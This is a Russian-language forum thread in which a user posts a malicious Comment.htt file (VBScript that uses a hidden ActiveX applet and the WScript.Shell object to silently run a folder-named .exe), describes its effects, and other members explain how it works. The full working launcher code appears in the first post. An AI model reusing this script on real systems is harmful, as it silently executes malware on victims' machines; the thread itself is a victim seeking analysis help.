ВИРУС!!!!! На BASIC'е / Visual Basic

ReSQL.ru

2.0.61

Планшетная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / Visual Basic [игнор отключен] [закрыт для гостей] / ВИРУС!!!!! На BASIC'е / 10 сообщений из 10, страница 1 из 1

07.10.2006, 17:56

#34039645

Charles Weyland

Участник

Откуда: Feorina "Fury" 161
Сообщения: 4 426
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

Люди!

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.

<body><html>
<body >
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) -  11 )
Path = Mid(Path,  9 )
Set AppleObject = document.applets("lhw")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
Wsshell.run(Path + "папка.exe")
</script>
</body>
</html>
</body>

Это вирус, который меня жудко достал в локальной сети! Постоянно атакует меня.
Просто сохраните его в файл Comment.htt - антивирус сразу завизжит!!
Кто хорошо Basic знает? Как действует эта штука?
Мои наблюдения:
Плодится немеренно! 5-я снизу строчка
http://]
Wsshell.run(Path + "фильмы.exe")

Она в каждой новой копии экземпляра Comment.htt меняется. И заменяется именем папки, в которой лежит. (этот экземпляр я достал из папки фильмы)
В моей папке "фильмы" ещё появился скрытый файл "фильмы.exe". Когда я его решил запустить - то редактирование и просмотр реестра стал для меня недоступным. Ещё перестали отображаться расширения у файлов. И перестали отображаться скрытые файлы/папки. изчез пункт меню Сервис->свойства папки. Всё остальное вроде норма... С этими последствиями антивир сделать ничего не может. Только удаляет файлы типа Фильмы.exe и Comment.htt , а больше ничего....

Кто поделится мнением, что это за прога такая? И чего ещё она может натворить с моим компом?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

07.10.2006, 22:51

#34039857

А.Грасоff™

Участник

Откуда: ∞
Сообщения: 10 227
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

ниплоха. очень неплоха. взял на зометку.

--
я все время наблюдал как вы пытались распознать меня среди остальных.
я выиграю эту партию.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

08.10.2006, 08:47

#34039977

k-nike2

Гость

ВИРУС!!!!! На BASIC'е

Бейсик не знаю, но:
Это разве вирус? По-моему это что-то, что меняет какой-то ключ в реестре и запускает какой-то файл, а сам вирус, наверное, в папка.exe хранится или в другом файле прописанном в реестре.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

08.10.2006, 11:53

#34040021

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

Эта хрень создает экземпляр Windows Script Host и через него запускает файл папка.exe, лежащий там же, где и сам html-файл.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

08.10.2006, 19:33

#34040318

Charles Weyland

Участник

Откуда: Feorina "Fury" 161
Сообщения: 4 426
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

ну так фишка в том, что по началу у меня папка.exe-то не существует.... она берётся откуда-то. И пока не запущена эта папка.exe - винда работает нормально...
Ну в общем, кто может подробнее описать строки

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.

....
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
....
Set AppleObject = document.applets("lhw")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
....

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

09.10.2006, 07:01

#34040543

orunbek

Участник

Откуда: Гималай
Сообщения: 2 066
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

Ну в реестре посмотрите ветку HKEY_CLASSES_ROOT\CLSID
под этим номером ({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}) у меня например Windows Script Host Shell Object, значит он создает объект WScript.Shell

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

09.10.2006, 15:38

#34041997

Charles Weyland

Участник

Откуда: Feorina "Fury" 161
Сообщения: 4 426
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

orunbek..... значит он создает объект WScript.Shell
А что это за объёкт такой?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

10.10.2006, 07:27

#34043146

orunbek

Участник

Откуда: Гималай
Сообщения: 2 066
Рейтинг: 0 / 0

ВИРУС!!!!! На BASIC'е

Windows Script googl'ом поищите, выйдет куча примеров
через этот объект можно запускать программы, например
run.vbs

Код: plaintext

1.
2.
3.
4.
5.

Option Explicit
Dim objWsShell
Set objWsShell=WScript.CreateObject("WScript.Shell")
objWsShell.Run "notepad.exe" 'или objWsShell.Run "папка.exe"
Set objWsShell=Nothing

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

30.11.2006, 12:06

#34166612

Zverkov76

Гость

ВИРУС!!!!! На BASIC'е

Это вирь, ОДНАЗНАЧНО!!!.
Вот те ссылочка, тама все популярно расписано.
http://daxa.com.ua/vir.php?hnum=28

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Период между сообщениями больше года.

28.12.2008, 16:10

#35738719

Skayder

Гость

ВИРУС!!!!! На BASIC'е

На сколько я понял тут идёт создание аплеты, потом через vbscript эта шняга получает созданный апплет и запускает его...а уж что этот апплет делает, ты смотри сам.
Единственное что до меня не допёрло, это каким таким способом откудата создаёться папка.exe
тут сразу возникает вопрос, тело вируса это? или нет...может и вправду, это всего лиш болванка по запуску и созданию апплета...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Форумы / Visual Basic [игнор отключен] [закрыт для гостей] / ВИРУС!!!!! На BASIC'е / 10 сообщений из 10, страница 1 из 1

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=60&mobile=1&tid=2161482]:	0ms
get settings:	9ms
get forum list:	20ms
check forum access:	3ms
check topic access:	3ms
track hit:	54ms
get topic data:	11ms
get forum data:	3ms
get page messages:	57ms
get tp. blocked users:	2ms
others:	198ms

total:	360ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы